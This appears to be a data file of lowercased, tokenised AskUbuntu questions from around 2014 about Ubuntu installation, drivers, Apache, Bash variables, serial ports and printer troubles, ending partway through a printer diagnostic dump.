513925	ubuntu not instaling	i 'm trying to install ubuntu 14.04.1-desktop-i386 on a 32-bit thinkpad t400 with windows 7 on it . i have tried installing ubuntu by mounting the iso from a dvd+r i burned , a usb drive , and my downloads folder . i mount the iso with virtual clone drive . i downloaded the iso from the ubuntu website . when i try to install by rebooting the computer , i get sent straight to windows 7 , as if a regular restart just occurred . when choosing the `` help me boot from cd '' option , i am asked to install cd boot helper . unfortunately , an error comes up that says : can not install into c : /ubuntu . there is another file or directory with this name . please remove it before continuing . for more information , please see the log file : c : /users/admin/appdata/local/temp/wubi-14.04-rev286.log i am not sure what to do . i deleted the wubi-related files i could identify in the folder , and it still does not work . please help . edit : i want to remove windows 7 from my computer , and ubuntu is not installed at all on my computer . just in case i was n't clear
513926	problems watching pay-for-view streaming content	i am using xubuntu 14.04 with firefox 31 as my browser . i can not get pay-for-view movies from google play , youtube or acorn ( tv ) to work . regular youtube videos work fine for some reason -- as do other video clips -- it 's only on the paid stuff that i ca n't get it to work . if i shut down and reboot into windows 7 ( also using firefox 31 ) , they stream just fine . i assume this is something to do with flash since only the operating system changes . and since adobe no longer upgrades flash for linux , my flash is probably hopelessly out of date . is there an alternative or workaround ( simple please -- i am not a computer geek , just a user who hates microsoft ) that will allow me to watch movies/tv in xubuntu ? i want to reformat and completely get rid of windows , but until i can figure out how to get these to stream in linux , i need it . i have tried chromium and opera on xubuntu , but the problem persists . the folks at acorn tv recently switched servers to brightcove , and the second they did that , all of the linux people suddenly could n't watch their content any more . ( it worked fine before the switch . ) i contacted them ( 4 times ! ! ! ) and they assured me they were working on it , but as of yesterday , they suggested i unsubscribe and offered me money back because they said ... '' i 'm sorry but we are unable to offer guaranteed support on linux . you should be able to watch drm protected content if the browser you use supports flash version 12.2 or higher . for more info , please see : http : //helpx.adobe.com/flash-player/kb/protected-video-content-play.html . '' but then they added ... '' if you really love the content and you still wish to watch , you might try subscribing through the youtube channel instead . all of the content is the same and youtube is able to work on more platforms . the channel is at www.youtube.com/acorntv . '' problem is , when i pay to watch movies on youtube , i ca n't . why would this be different ? or is it ? i am lost . can someone please suggest something ? thanks !
513932	what is the $ bash_command variable good for ?	according to the bash manual , the environment variable bash_command contains the command currently being executed or about to be executed , unless the shell is executing a command as the result of a trap , in which case it is the command executing at the time of the trap . taking that trap corner case aside , if i understand correctly this means that when i execute a command , the variable bash_command contains that command . it 's not absolutely clear whether that variable is unset after the command execution ( i.e. , is only avaialble while the command is running , but not after ) , though one might argue that since it is `` the command currently being executed or about to be executed '' , it is not the command that was just executed . but let 's check : $ set | grep bash_command= $ empty . i would have expected to see bash_command='set | grep bash_command= ' or maybe just bash_command='set ' , but empty surprised me . let 's try something else : $ echo $ bash_command echo $ bash_command $ well that makes sense . i execute the command echo $ bash_command and so the variable bash_command contains the string echo $ bash_command . why did it work this time , but not before ? let 's do the set thing again : $ set | grep bash_command= bash_command='echo $ bash_command' $ so wait . it was set when i executed that echo command , and it was not unset afterwards . but when i executed set again , bash_command was not set to the set command . no matter how often i execute the set command here , the result stays the same . so , is the variable set when executing echo , but not when executing set ? let 's see . $ echo hello askubuntu hello askubuntu $ set | grep bash_command= bash_command='echo $ bash_command' $ what ? so the variable was set when i executed echo $ bash_command , but not when i executed echo hello askubuntu ? where 's the difference now ? is the variable only set when the current command itself actually forces the shell to evaluate the variable ? let 's try something different . maybe some external command this time , not a bash builtin , for a change . $ /bin/echo $ bash_command /bin/echo $ bash_command $ set | grep bash_command= bash_command='/bin/echo $ bash_command' $ hmm , ok ... again , the variable was set . so is my current guess correct ? is the variable only set when it has to be evaluated ? why ? why ? for performance reasons ? let 's do one more try . we 'll try to grep for $ bash_command in a file , and since $ bash_command should then contain a grep command , grep should grep for that grep command ( i.e. , for itself ) . so let 's make an appropriate file : $ echo -e `` 1 foo\n2 grep\n3 bar\n4 grep \ $ bash_command tmp '' > tmp $ grep $ bash_command tmp grep : $ bash_command : no such file or directory tmp:2 grep < -- here , the word `` grep '' is red tmp:4 grep $ bash_command tmp < -- here , the word `` grep '' is red tmp:2 grep < -- here , the word `` grep '' is red tmp:4 grep $ bash_command tmp < -- here , the word `` grep '' is red $ set | grep bash_command= bash_command='grep -- color=auto $ bash_command tmp' $ ok , interesting . the command grep $ bash_command tmp got expanded to grep grep $ bash_command tmp tmp ( the variable gets expanded just that once , of course ) , and so i grepped for grep , once in a file $ bash_command which does n't exist , and twice in the file tmp . q1 : is my current assumption correct that : bash_command is only set when a command tries to actually evaluate it ; and it is not unset after execution of a command , even though the description may lead us to believe so ? q2 : if yes , why ? performance ? if no , how else can the behavior in the above command sequence be explained ? q3 : lastly , is there any scenario in which this variable could actually be meaningfully used ? i was actually trying to use it within $ prompt_command to analyze the command being executed ( and do some stuff depending on that ) , but i ca n't , because as soon as , within my $ prompt_command , i execute a command to look at the variable $ bash_command , the variable gets sets to that command . even when i do myvariable= $ bash_command right at the beginning of my $ prompt_command , then myvariable contains the string myvariable= $ bash_command , because an assignment is a command too . ( this question is not about how i could obtain the current command within a $ prompt_command execution . there are other ways , i know . ) it 's a bit like with heisenberg 's uncertainty principle . just by observing the variable , i change it .
513934	shotwell crashing with core dump	when i try to import pictures and videos from a local directory , shotwell crashes . i already upgraded shotwell from yorba repositories to 0.18.1 . here follows the message when running from terminal : ~ $ shotwell l 692 2014-08-20 14:49:24 [ crt ] directory sony2 with 21072 entries considered invalid ; not read . l 692 2014-08-20 14:49:24 [ crt ] upper boundary of data for directory sony1 , entry 0xa200 is out of bounds : offset = 0x0000197a , size = 2644 , exceeds buffer size by 76 bytes ; truncating the entry l 692 2014-08-20 14:49:24 [ crt ] upper boundary of data for directory sony1 , entry 0xa200 is out of bounds : offset = 0x0000197a , size = 2644 , exceeds buffer size by 76 bytes ; truncating the entry l 692 2014-08-20 14:49:24 [ crt ] upper boundary of data for directory sony1 , entry 0xa200 is out of bounds : offset = 0x0000197a , size = 2644 , exceeds buffer size by 76 bytes ; truncating the entry ( shotwell-video-thumbnailer:809 ) : gstreamer-critical ** : gst_structure_new_empty : assertion 'gst_structure_validate_name ( name ) ' failed ( shotwell:692 ) : gstreamer-critical ** : gst_structure_new_empty : assertion 'gst_structure_validate_name ( name ) ' failed segmentation fault ( core dumped ) what can i do to solve this ? below some information from my system : ~/downloads $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty ~ $ dpkg -l shotwell desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-=============================================-===========================-===========================-=============================================================================================== ii shotwell 0.18.1-1~trusty1 amd64 digital photo manager
513937	dual-monitor layout and primary display with nvidia in gnome-shell	i have installed ubuntu 14.04.1 with gnome-shell version 3.10.4 . i can attach a second monitor to my laptop and it is recognized . if i configure it with the nvidia-settings at the right of my laptop then all works fine ( the extention of the display works as an extention on the right , not dual ) . now what i want is to have the second monitor configured over the laptop-display . when i 'm not using gnome-shell , it works correct ( i can drag an application from the bottom display to the top normally ) but with gnome-shell i have to press ctrl+shift+ mouse help , and resize properly the application size . this is for me an enforcing . is there a way to make that gnome-shell work properly with a bottom/top monitor ?
513939	computer automatic shutdown issue	i am using hp pavilion g4 which has a 1 gb radeon graphics along with intel速 sandybridge mobile . i am using ubuntu 14.04 . whenever i watch a hd movie using smplayer or vlc player , my laptop always shuts down automatically within 5 minutes and restarts itself . can someone please tell me what should i do to stop this ? ?
513941	software center disappeared after installing exelearning	i have installed ubuntu today and everything worked pefectly . but i must have done something wrong because i can not find or install the software center . i tried to install the authoring programm exelearning . there was a problem in the installation and now , when i search in the dashboard for software center the icon and name of exelearning appears . i have tried this command in the terminal : sudo apt-get install software-center and this is what i got : beatriz @ beatriz-lifebook-a512 : ~ $ apt-get install software-center e : no se pudo abrir el fichero de bloqueo «/var/lib/dpkg/lock» - open ( 13 : permiso denegado ) e : no se encontró un archivo de réplica «/var/lib/dpkg/» any help ? since i have only installed some applications until now , i could also re-install ubuntu and start from zero again . but i would like to solve this problem and specially to know what i did wrong to avoid it in the future . thanks , beatriz . @ enedil : sorry for the misuse of comments/answer question . i 'm new here . wo n't happen again . @ enedil , @ leon95 : thanks for your efforts and help . nothing worked , possibly because i have some lacks of knowledge . i have reinstalled ubuntu 10.4 again , i had just started to intall programms and it is the faster solution . i have realized also the bluetooth icon and the applications gimp and vlc and maybe others disappeared . i start from zero again .
513943	how can i get my dell c1760nw printer to work with ubuntu ?	ubuntu does n't recignize this model of printer automatically . how can i get it to work correctly in ubuntu ?
513947	apache2 installation problem in ubuntu 14.04 lts	i 'm novice to use ubuntu . i recently install 14.04 in my system . i had installed lamp and then i forgot mysql password . so i had permanently remove lamp . now i 'm trying to install it again but it 's not working : sudo apt-get install apache2 reading package lists ... done building dependency tree reading state information ... done apache2 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . then i tried sudo service apache2 restart /etc/init.d/apache2 : 64 : . : ca n't open /etc/apache2/envvars /etc/init.d/apache2 : 76 : . : ca n't open /etc/apache2/envvars why is this happening ? what can i do to remedy the issue ?
513949	whitch flavour should i chose ?	i 've got a notebook with a amd athlon ( tm ) 64 x2 dual-cor processor tk-53 on 1,70 ghz whith 2 gig ram should i pick the 32 or the 64-bit version ? greetz
513950	ubuntu 14.04.01 os installation wipes out 12.04.04 now os is absent	i was trying to install ubuntu 14.04.01 lts but i did not succeed . now my previous version 12.04.04 lts is also gone . i tried to install both again . but no success . my system details : asus 1015 e mini-laptop ( 10 inches ) ... 2gb ram ... 320gb hdd ... intel celeron cpu 847 @ 1.10ghz x2 processor ... 64 bit ...
513954	how do you detect file changes	since linux is vulnerable to a number of similar vulnerabilities as windows . i 'm trying to find a daemon that catalogs and alerts me/user of any and all file changes as well as file additions . is there one out there or do i have to make one of my own ?
513955	how can i install the driver for nvidia geforce 8600 gt on ubuntu 14.04 ?	i am new to the community so please forgive me if i do n't provide the necessary details ... so , i am running ubuntu 14.04 and windows 7 in a dual boot , and i 'm having issues with my video card in ubuntu . the mouse does n't flicker and the windows do n't glitch when i move them around so i suppose i 'm running on an opensource driver , however , in youtube for example , the video is glitching every few frames . i have tried to install an nvidia driver from the `` additional drivers '' option from ubuntu however , that progress bar at the bottom after i select the driver i want and hit `` apply '' does n't seem to move at all from the start , and i 've left it for a few hours hoping my old pc is just ... old ... i have also tried to follow a tutorial from youtube about how to get the driver installed using the `` terminal '' by adding a `` ppa '' and some `` sudo apt-get install nvidia # # # '' commands , however , that ruined everything and i was forced to reinstall ubuntu . i 've also found the driver needed for my video card for linux 32 bit on `` nvidia.com '' however , i get stuck after i download it , it 's a `` .run '' file that i have no idea what to do with other than double click , but that did n't seem to work . can someone please let me know where i 'm doing something wrong or how to get the driver i need installed on my pc ? sorry for the long post , i 've tried to give all the information i could about the issue . thank you very much for taking your time to read all this , any help is greatly appreciated .
513957	google chrome touchscreen - right-click gets stuck	i 'm having some problems with google chrome and my touchscreen in ubuntu 14.04 . basic touchscreen usage works fine , but if i double-tap on the touchscreen ( the gesture for a right-click , as far as i can tell ) , then every time i touch the screen after that , it acts as if i 've right-clicked . this problem appears to be unique to chrome ; xterm , for example , acts normally . any suggestions ? is there a way to get touchscreen events to act identically to mouse events ? for example , i found where i can disable touch events ( using chrome : //flags/ # touch-events ) , but that completely disables tap for left click . is anyone successfully using a touchscreen with google chrome in ubuntu 14.04 ? ( i 'm working on this for a kiosk-style setup , so i 'm using ubuntu server and nodm instead of unity or another desktop shell , and my hardware 's a little unusual also . )
513958	ubuntu 14.04 does not recognize my battery	for the last 3 years i 've been using a samsung notebook . i was using ubuntu 13.10 until 2 weeks ago . then i decided to format and install ubuntu 14.04 lts . everything was working great , until the third day , when i did not do anything else than installing the software updates , i noticed my battery was not being recognized . the battery indicator shows charging , and when i click it it just says battery . the day started to malfunction just said unknown battery , and when i unplugged my laptop it shut down . if a try to turn on my laptop with the battery in and not plugged into an ac adapter , it does not turn on : it only works when its plugged in . also , when its plugged in with the battery the light showing the battery status is now always switching from green to red ( which it never did before ) . i guessed it was just my battery dieing , so i tried in another notebook like mine and was working perfectly , full battery , 3 hrs and a half running . how can i get ubuntu to recognize my battery ? i really do n't want a laptop that is a portable pc , i need a portable laptop again .
513964	mounting point/ partition permissions	i have 2 partitions in my linux os , and one of them is assigned to mounting point /x . how can i change the permissions , so me and other programs can make files there without root privileges ?
513967	is ubuntu touch a separate distribution or the same one ?	i would like to install the latest ubuntu touch on a 2013 nexus 7 tablet . which version should i be looking for : the regular ubuntu ( for arm platform ) or a separate ubuntu touch ? i understand that ubuntu touch is in frantic development , but i would like to be able to keep track which one is which . i can see the following images : ubuntu 14.09 rtm , daily-preinstalled ubuntu touch 14.10 ( utopic unicorn ) daily build ubuntu 14.10 ( utopic unicorn ) daily build , but only i386 and amd64 ; no arm . does it mean that arm variant has moved to one of the first two links ? which is the right one to download to run on a nexus 7 tablet ?
513969	why is ubuntu server dovecot 2 coming up with unknown setting : driver	so like i said in the quest dovecot 2 keeps coming up with `` unknown setting : driver '' . i 've been following a guide and setup my auth-sql.conf.ext file however when i try and start up dovecot 2 i get this weird error . i 've checked the packages dovecot-mysql is installed and auth-sql.conf.ext is in the right place ... hmm ...
513970	missing /etc/knockd.conf	i am trying to configure port knocking on ubuntu server14.04 . my problem is i am trying to configure port knocking and when i try to edit the /etc/knockd.conf i can not find it . try using locate knockd.conf and it is nowhere to be found . i have tried removing knockd and reinstalling it and that did not create the knockd.conf . i am new to ubuntu server and fairly new to linux in general too . is there a way to get this missing knockd.conf ? also is /etc/knockd.conf created during the ubuntu server install or is it craeted with another package ? i guess at most i just need to know how to get this back
513972	no option to upgrade to 14.04	$ sudo apt-get update # do n't get any errors $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . $ sudo update-manager -d ubuntu checks for updates , tells me my computer is up to date . but there are only two options now `` ok '' and `` settings '' . according to this and several other websites , there should be an option to upgrade it to 14.04 , but i 'm seeing none . how can i upgrade to 14.04 ?
513979	ca n't reboot into windows 8.1 from ubuntu	i am newb in ubuntu . currently i am using an acer v11 laptop with a pre-intalled windows 8.1 . i follow some guideline ( http : //www.everydaylinuxuser.com/2014/05/install-ubuntu-1404-alongside-windows.html ) which successfully install ubuntu 14.04 lts alongside windows 8.1 with uefi enabled all the way throughout the installation and my current usage and a grub . but i got into some problem . the dual boot mostly works fine as i am able to successfully boot into either one of the windows 8.1 or ubuntu when stating my laptop . however it ran into issue after i start the device and use ubuntu for a while ( 2 hour for instance ) and then restart it : if i press the restart from ubuntu , the grub still shows and i am still able to choose the windows boot manager . but the windows loading process was stuck at the acer loading screen and i am not able to see the standard circular win8 loading progress bar . does someone know why would this happens ?
513980	ubuntu not loading at startup	i recently installed ubuntu 14.04 lts to my laptop , toshiba satellite s55t-a5331 . i had nothing on the 1tb hdd . for some reason when i restarted , as asked by the installer , i get the message : `` reboot and select proper boot device '' . so loaded up the live usb and opened disks to check and make sure it installed properly . surprisingly , everything is installed , however , i noticed that the swap partition is marked active and not any of the other 2 , fat ( efi ) and ext4 . in my laptop 's bios , i have disabled the secure boot feature . am i missing something ?
513981	tkinter on ubuntu 14.04 seems not to work	i receive following traceback : traceback ( most recent call last ) : file `` tkinter_basic_frame.py '' , line 4 , in < module > from tkinter import tk , frame , both file `` /usr/lib/python2.7/lib-tk/tkinter.py '' , line 42 , in raise importerror , str ( msg ) + ' , please install the python-tk package' importerror : no module named _tkinter , please install the python-tk package this is the demoscript i 'm trying to run : # ! /usr/bin/python # -*- coding : utf-8 -*- from tkinter import tk , frame , both class example ( frame ) : def __init__ ( self , parent ) : frame.__init__ ( self , parent , background= '' white '' ) self.parent = parent self.initui ( ) def initui ( self ) : self.parent.title ( `` simple '' ) self.pack ( fill=both , expand=1 ) def main ( ) : root = tk ( ) root.geometry ( `` 250x150+300+300 '' ) app = example ( root ) root.mainloop ( ) if __name__ == '__main__ ' : main ( ) from my knowledge tkinter should be included in python 2.7 . why do i receive the traceback ? does n't ubuntu contain the standard-python-distribution ? this is solved . i had to install it manually in synaptic ( got the hint in the meantime from another forum ) , see here : wikipedia says : `` tkinter is a python binding to the tk gui toolkit . it is the standard python interface to the tk gui toolkit1 and is python 's de facto standard gui,2 and is included with the standard windows and mac os x install of python . '' - not good , that it is n't included in ubuntu as well . tkinter on wikipedia
513982	terminator automatically resizing	i 'm not sure if this is an ubuntu thing or a terminator thing , but every time i launch terminator , it seems to resize to a different size every time . sometimes it shrinks a little , and some time a lot . i have set the size that i want it to be in the config : ~ $ cat .config/terminator/config [ global_config ] enabled_plugins = , [ keybindings ] full_screen = f10 [ profiles ] [ [ default ] ] scrollback_lines = 5000 font = monaco bold 8 use_system_font = false scrollback_infinite = true background_image = none [ layouts ] [ [ default ] ] [ [ [ child1 ] ] ] type = terminal parent = window0 profile = default [ [ [ window0 ] ] ] type = window parent = `` '' size = 1099 , 800 [ plugins ] is there a way to stop it from trying to do anything automatically , and just open the same size every time ?
513985	ca n't read data through usb serial port , but can send data	i have two computers connected by usb-rs485 serial adapters . on one computer , i type cat > /dev/ttyusb0 at the prompt , and the other ( windows ) i run putty on the appropriate com port . typing things in on the first computer comes through clear on the second computer . however , typing cat /dev/ttyusb0 to listen to the port on the 1st computer yields nothing when trying to send from the 2nd computer back to the 1st . i 've tried python on the 2nd computer to simply open the com port and send a few characters , and also a dos command line trick to just send a few characters , but nothing comes through . here 's the result of stty -f /dev/ttyusb0 -a on the first computer : root @ brutusii : ~ # stty -f /dev/ttyusb0 -a speed 9600 baud ; rows 0 ; columns 0 ; line = 0 ; intr = ^c ; quit = ^\ ; erase = ^ ? ; kill = ^u ; eof = ^d ; eol = < undef > ; eol2 = < undef > ; swtch = < undef > ; start = ^q ; stop = ^s ; susp = ^z ; rprnt = ^r ; werase = ^w ; lnext = ^v ; flush = ^o ; min = 1 ; time = 0 ; -parenb -parodd cs8 hupcl -cstopb cread clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr -icrnl -ixon -ixoff -iuclc -ixany -imaxbel -iutf8 -opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 -isig -icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke i have of course opened the port on the 2nd computer with the matching 9600 baud speed . any ideas as to what i 'm missing here ? tia
513990	run bottle app on my server	i program my app with python bottle in my pc . i run my app with run ( host='localhost ' , port = 80 ) i want to run app on my ubuntu vps that installed virtualmin on it . how can i do this ?
513991	dualboot or virtualbox any performance differences ?	virtualbox mostly uses lot of cpu and memory from my laptop , what if i install ubuntu dual boot instead using virtualbox , is it gona increase ubuntu performance dramatically ? also which one is better for ruby development performance dual boot or virtualbox ?
513993	playing facebook games	i love playing city girl on facebook but have to switch between ubuntu to windows as mine is duel loading . i 'm an absolute beginner with ubuntu and i need simple answers on how can play it ( if i can ) or not on ubuntu .
513997	apache2 webserver authentication issues/setup	i have recently installed apache2 webserver , i have been looking on forums and cant find a simple tutorial on how to set up authentication for apache , my system is running ubuntu 14.04 . i keep coming accross httpd.conf as a file that needs to be edited , from some research i have found that this file no longer is used in newer ubuntu releases . any help ? thanks , joshua .
513999	slow login after installing ubuntu 14.04	i freshly installed ubuntu 14.04 . i already used ubuntu before , and it the did not take any noticeable time to login . however , in ubuntu 14.04 , unity seems to start slowly . first , i only see the cursor and the background like in this thread , but after 8-12 seconds the launcher and the top bar show up ( unlike the thread linked above ) . booting is as fast as always ( time between start and login manager ) , but the login time is really annoying . the questions i red are about unity not showing up at all .
514000	passing a font as an argument to a script	i am trying to use osdsh for notifications . it has a 'font ' parameter that receives a curiously formed string . from the man : -f -font set font ( default : -*-lucidatypewriter- bold-*-*-*-*-240-*-*-*-*-*-* ) the manual does not comment on the arguments passed ( i assume each * represents a possible argument ) . it would seem that this notation is ( or has someday been ) standard , but i 've not been able to find anything about it . what is the standard ? what argument specifies letter size ?
514013	disable all hotkeys with dconf-editor	i 'm building a deb package that will create a kiosk user account . when you login to this account , the browser automatically starts and navigates to a pre-given website . also all the hotkeys should be disabled except for one you defined . now i 'm at the part that the browser starts and my disable script is excecuted on logon but for exaple , i can still close the browser with alt + f4 . and when i check the dconf-editor for the hotkeys , for every single one the bind is deleted , but mine for close is n't added . like you can see in the printscreen . i disabled all these keys with this code , one line for evere hotkey gsettings set org.gnome.desktop.wm.keybindings begin-resize [ ] so this seams to work , but at the bottom of my disable script this line should be executed . gsettings set org.gnome.desktop.wm.keybindings close [ ' < alt > b ' ] does anyone know why i 'm able to unbind all these hotkeys in my dconf-editor but they are able to still do their job ? and when it is possible to unbind them , why cant i bind mine ? i searched the web for a solution but could n't find one fitting my needs , i hope some of you know the answer to this . regards gijs
514015	uninstall ubuntu from external hard drive + remove bootloader from internal hd	i have created a bootable usb stick with linuxlive and ubuntu.i then tried to install ubuntu on my external harddrive . however i guess i wrongly picked the drive where the boot section is installed , it now is installed on my internal ( c : ) drive . when i open the bios bootsequence it says ubuntu 2 times ? as if the boot is installed twice ? i 'd like to uninstall ubuntu from my external drive but most important : i do n't want grub to be start up on my pc . i tried booting in windows 8 recovery mode and used the following commands : bootrec /fixmbr bootrec /fixboot however the ubuntu choices wont disappear ? i then tried to add bootrec /scanos and bootrec /rebuildbcd to the commands but somehow this wont work either . anyone got some ideas ? thank you in advance ! best regards , bart
514016	error installing package control for sublime text 3 on ubuntu 14.04	this is the error . it comes up when i paste and enter the installation code ( which i get from the package control website ) and each time i open up sublime text . package control your system 's locale is set to a value that can not handle non-ascii characters . package control can not properly work unless this is fixed . on linux , please reference your distribution 's docs for information on properly setting the lang environmental variable . as a temporary work-around , you can launch sublime text from the terminal with : lang=en_us.utf-8 sublime_text i had the same problem with ubuntu 13.04 so it 's probably not version-dependent .
514017	is djvubundle available in ubuntu ?	the official webpage says assembling djvu images into multipage documents the batch compressors distributed as part of the djvutext and djvulayered packages can directly produce multipage djvu file when fed with multiple input files . the files produced are smaller than if the pages are compressed separately because the compressor can extract and share redundant information accross multiple pages . individually compressed djvu pages can be assembled into multipage documents using the free package djvumulti . to assemble a bunch of djvu images into a single bundled document simply type : djvubundle page1.djvu page2.djvu ... . pagen.djvu document.djvu to assemble a bunch of djvu images into an indirect document , type : djvujoin page1.djvu page2.djvu ... . pagen.djvu documentdir/index.djvu where documentdir must be an existing directory where all the individual page files will be copied . to disassemble a bundled document into an indirect one , simply say : djvujoin document.djvu documentdir/indexfile.djvu to convert a multipage document from one of the old 2.0 multipage formats , do djvureindex olddocument newdocument the programs djvujoin , and djvubundle supersede the 2.0 programs djvuindex and djvumerge . i could n't find djvujoin and djvubundle for ubuntu . djvulibre does n't have them either . do i miss something ? thanks .
514018	how do i get to work my atheros ar9485 wireless card in ubuntu 14.04 lts ?	i 've recently installed ubuntu 14.04 lts in my asus d550ca , and so far things have gone great . the only problem i 've got is the wi-fi . it does n't work . i 've got an qualcomm atheros ar9485 . i 've tried installing the drivers , but the sytem says it does n't find any . so i started looking around this forum for solutions . i 've read every single post from this forum about my wi-fi network adapter , and i 've found nothing that solves my problem . let me give you some info about my configuration . disclaimer : my configuration is in spanish , so if you do n't understand something you can either use google translate , or use your imagination . : d when i run $ sudo lshw -c network this is what i get : *-network deactivated descripción : interfaz inalámbrica producto : ar9485 wireless network adapter fabricante : qualcomm atheros id físico : 0 información del bus : pci @ 0000:02:00.0 nombre lógico : wlan0 versión : 01 serie : 28 : e3:47:5c:5d:3f anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuración : broadcast=yes driver=ath9k driverversion=3.13.0-34-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn recursos : irq:17 memoria : f7d00000-f7d7ffff memoria : f7d80000-f7d8ffff *-network descripción : ethernet interface producto : rtl8101e/rtl8102e pci express fast ethernet controller fabricante : realtek semiconductor co. , ltd. id físico : 0.2 información del bus : pci @ 0000:03:00.2 nombre lógico : eth0 versión : 06 serie : e0:3f:49 : ce:57:49 tamaño : 100mbit/s capacidad : 100mbit/s anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuración : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8402-1_0.0.1 10/26/11 ip=181.165.245.39 latency=0 link=yes multicast=yes port=mii speed=100mbit/s recursos : irq:41 ioport : e000 ( size=256 ) memoria : f0004000-f0004fff memoria : f0000000-f0003fff at the beginning , you 'll see that it says `` *-network deactivated '' ( or at least that 's what i translated ) , is that something bad ? then , when i run ipconfig this is what i get : eth0 link encap : ethernet direcciónhw e0:3f:49 : ce:57:49 direc . inet:181.165.245.39 difus . :181.165.245.255 másc:255.255.255.0 dirección inet6 : fe80 : :e23f:49ff : fece:5749/64 alcance : enlace activo difusión funcionando multicast mtu:1500 métrica:1 paquetes rx:221199 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:62025 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:124409589 ( 124.4 mb ) tx bytes:7471899 ( 7.4 mb ) lo link encap : bucle local direc . inet:127.0.0.1 másc:255.0.0.0 dirección inet6 : : :1/128 alcance : anfitrión activo bucle funcionando mtu:65536 métrica:1 paquetes rx:2977 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:2977 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:0 bytes rx:397158 ( 397.1 kb ) tx bytes:397158 ( 397.1 kb ) when i put iwconfig : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off finally , when i put sudo rfkill list all , i got : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no i hope anyone can help me solve this , i 've searched a lot and found no solution . thanks a lot .
514019	can not print after upgrading from 12.x to 14.04	after upgrading from v12.04 to v14.04 i am not able to print . i am using an hp laserjet 400 m451dn . the printer troubleshooter told me that there is no solution to the problem . this is the output of the advanced diagnositc output . ( due to limited space i cut the output ! ) can anybody tell me what is going wrong . i am using the printer via usb ? page 1 ( scheduler not running ? ) : { 'cups_connection_failure ' : false } page 2 ( is local server publishing ? ) : { 'local_server_exporting_printers ' : false } page 3 ( choose printer ) : { 'cups_dest ' : < cups.dest hp-laserjet-400-color-m451dn ( default ) > , 'cups_instance ' : none , 'cups_queue ' : u'hp-laserjet-400-color-m451dn ' , 'cups_queue_listed ' : true } page 4 ( check printer sanity ) : { 'cups_device_uri_scheme ' : u'hp ' , 'cups_printer_dict ' : { 'device-uri ' : u'hp : /usb/hp_laserjet_400_color_m451dn ? serial=cnff308670 ' , 'printer-info ' : u'hewlett-packard hp laserjet 400 color m451dn ' , 'printer-is-shared ' : true , 'printer-location ' : u'pinatubo ' , 'printer-make-and-model ' : u'hp lj 300-400 color m351-m451 postscript ( recommended ) ' , 'printer-state ' : 4 , 'printer-state-message ' : u '' , 'printer-state-reasons ' : [ u'none ' ] , 'printer-type ' : 8556636 , 'printer-uri-supported ' : u'ipp : //localhost:631/printers/hp-laserjet-400-color-m451dn ' } , 'cups_printer_remote ' : false , 'hplip_output ' : ( [ '' , '\x1b [ 01mhp linux imaging and printing system ( ver . 3.14.6 ) \x1b [ 0m ' , '\x1b [ 01mdevice information utility ver . 5.2\x1b [ 0m ' , '' , 'copyright ( c ) 2001-13 hewlett-packard development company , lp ' , 'this software comes with absolutely no warranty . ' , 'this is free software , and you are welcome to distribute it ' , 'under certain conditions . see copying file for more details . ' , '' , '' , '\x1b [ 01mhp : /usb/hp_laserjet_400_color_m451dn ? serial=cnff308670\x1b [ 0m ' , '' , '\x1b [ 01mdevice parameters ( dynamic data ) : \x1b [ 0m ' , '\x1b [ 01m parameter value ( s ) \x1b [ 0m ' , ' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ' , ' back-end hp ' , `` cups-printers [ 'hp-laserjet-400-color-m451dn ' ] `` , ' cups-uri hp : /usb/hp_laserjet_400_color_m451dn ? serial=cnff308670 ' , ' dev-file ' , ' device-state -1 ' , ' device-uri hp : /usb/hp_laserjet_400_color_m451dn ? serial=cnff308670 ' , ' deviceid ' , ' error-state 101 ' , ' host ' , ' is-hp true ' , ' panel 0 ' , ' panel-line1 ' , ' panel-line2 ' , ' port 1 ' , ' serial cnff308670 ' , ' status-code 5002 ' , ' status-desc ' , '\x1b [ 01m ' , 'model parameters ( static data ) : \x1b [ 0m ' , '\x1b [ 01m parameter value ( s ) \x1b [ 0m ' , ' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ' , ' align-type 0 ' , ' clean-type 0 ' , ' color-cal-type 0 ' , ' copy-type 0 ' , ' embedded-server-type 0 ' , ' fax-type 0 ' , ' fw-download false ' , ' icon hp_color_laserjet_cp2025.png ' , ' io-mfp-mode 1 ' , ' io-mode 1 ' , ' io-support 6 ' , ' job-storage 0 ' , ' linefeed-cal-type 0 ' , ' model hp_laserjet_400_color_m451dn ' , ' model-ui hp laserjet 400 color m451dn ' , ' model1 hp laserjet 400 color m451dn ' , ' monitor-type 0 ' 